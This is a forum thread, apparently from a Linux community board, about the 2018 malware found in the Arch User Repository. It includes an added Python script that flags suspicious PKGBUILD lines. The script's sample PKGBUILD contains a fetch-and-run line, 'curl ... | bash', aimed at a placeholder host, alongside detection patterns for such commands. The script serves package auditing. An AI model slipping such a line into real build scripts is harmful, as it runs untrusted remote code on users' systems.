greengeek
Joined: 20 Jul 2010 Posts: 5624 Location: Republic of Novo Zelande
Posted: Wed 11 Jul 2018, 14:28 Post subject: Arch User Repository compromised. Malware added
The Arch User Repository has been compromised with the addition of some malware, as discussed here:
https://nakedsecurity.sophos.com/2018/07/11/another-linux-distro-poisoned-with-malware/
Seems as if the Arch admins are not overly concerned - basically stating that any repository can become contaminated and it is a case of "buyer beware - if you don't trust it don't install it."
Another timely reminder that adding new software (or allowing updates to previous software or system files) opens the door to increased risk.
spiritwild
Joined: 03 Oct 2016 Posts: 177
Posted: Wed 11 Jul 2018, 19:10
So..... Per the article, ARCH people think they are tech gods?
Is their response or lack of concern a display of arrogance or what?
8Geee
Joined: 12 May 2008 Posts: 2095 Location: N.E. USA
Posted: Wed 11 Jul 2018, 20:04
Wow, the admins have been compromised, too.
_________________ Linux user #498913 "Some people need to reimagine their thinking."
"Zuckerberg: a large city inhabited by mentally challenged people."
anikin
Joined: 10 May 2012 Posts: 1020
Posted: Thu 12 Jul 2018, 07:05
What exactly has been compromised?
AUR (Arch User Repository) is an unsupported repository, where untrusted users publish their recipes/build scripts/PKGBUILD, like for example this one:
https://aur.archlinux.org/packages/palemoon/
https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=palemoon
There are no binaries there - only recipes. Embarrassing - yes. Compromised - hardly.
scsijon
Joined: 23 May 2007 Posts: 1536 Location: the australian mallee
Posted: Thu 12 Jul 2018, 19:23
Blame is being placed on systemd
quotes:
The aim of the modified lines in acroread was to use curl to download scripts from a remote site, and the script would (if it worked) reconfigure systemd to restart on a regular basis.
looks like systemd makes it easier for compromises - one platform (systemdOS) one payload…
and a "few" others.
Be careful, folks....
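An added example, not part of the original thread: a small triage script that flags lines in a PKGBUILD worth reading before building, namely network fetches run as commands, output piped into a shell, and systemd changes, matching the kind of modification quoted above. The sample PKGBUILD, the rule names and the `audit` function are constructed for illustration, and `example.invalid` is a placeholder.

```python
import re

# Constructed sample, NOT the real modified acroread PKGBUILD.
SAMPLE = """\
pkgname=example-viewer
pkgver=1.0
makedepends=('curl')
source=("https://example.invalid/example-viewer-1.0.tar.gz")
# curl in a comment is ignored

curl -s https://example.invalid/a | bash &

package() {
  install -Dm755 viewer "$pkgdir/usr/bin/viewer"
  systemctl daemon-reload
}
"""

# Patterns that select lines for human review; they are not a verdict.
RULES = [
    ("network-fetch", re.compile(r"\b(curl|wget)\s")),
    ("pipe-to-shell", re.compile(r"\|\s*(sudo\s+)?(ba|da|z)?sh\b")),
    ("systemd-change", re.compile(r"\bsystemctl\b")),
]
FUNC_START = re.compile(r"^\s*(?:function\s+)?([A-Za-z_][\w-]*)\s*\(\)")


def audit(text):
    """Return (line_no, context, rule) for each flagged line.

    context is the enclosing function name, or "top-level" for code that
    runs as soon as the PKGBUILD is sourced, before any build step.
    """
    findings, context = [], "top-level"
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines and whole-line comments
        m = FUNC_START.match(line)
        if m:
            context = m.group(1)
        elif line.startswith("}"):
            context = "top-level"  # function body closed
            continue
        for name, rx in RULES:
            if rx.search(line):
                findings.append((no, context, name))
    return findings


if __name__ == "__main__":
    for no, context, rule in audit(SAMPLE):
        print(f"line {no} [{context}] {rule}")
```

Declared `source=()` URLs and dependency names are not flagged; only command lines are, so a hit means "read this line", not "this package is malicious".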
wiak
Joined: 11 Dec 2007 Posts: 1842 Location: not Bulgaria
Posted: Thu 12 Jul 2018, 19:28
scsijon wrote: "looks like systemd makes it easier for compromises - one platform (systemdOS) one payload."
Perhaps, but I don't see how systemd components are easier to compromise than systeminit components - main security issue would seem to be that of the malware app user running it whilst having root user permissions surely?
In the Puppy Linux world, dotpets are put up here and there by anyone who feels fit. Only well-tested and wanted ones end up in official repositories, that's true but murga forum site isn't so much different from AUR, which is also for user recipes (EDIT: except that the murga forum is less secure since it includes binaries and more often quite complex shell-script apps, not just recipes).
wiak
spiritwild
Joined: 03 Oct 2016 Posts: 177
Posted: Thu 12 Jul 2018, 19:50
I remember, about 20 years ago on a NASCAR forum, someone thought they would open a file account and give all the users the name and password info in a public message.
I was blown away and I thought it was the worst idea on the entire planet. The internet had not been around that long so maybe people still felt safe in their little shell of fans. Coming from a BBS background it was the same as giving everyone on Usenet my sysop password.
I made it known that I thought that was not a good idea because of obvious reasons but my concerns fell on deaf ears.
When it was hacked and someone changed the password, they all blamed me. Because no one else on the whole damn planet would have thought to walk through an open door and steal the goodies. Since I had concerns, I invited the crime to happen. I was amused.
Ah the good ol days.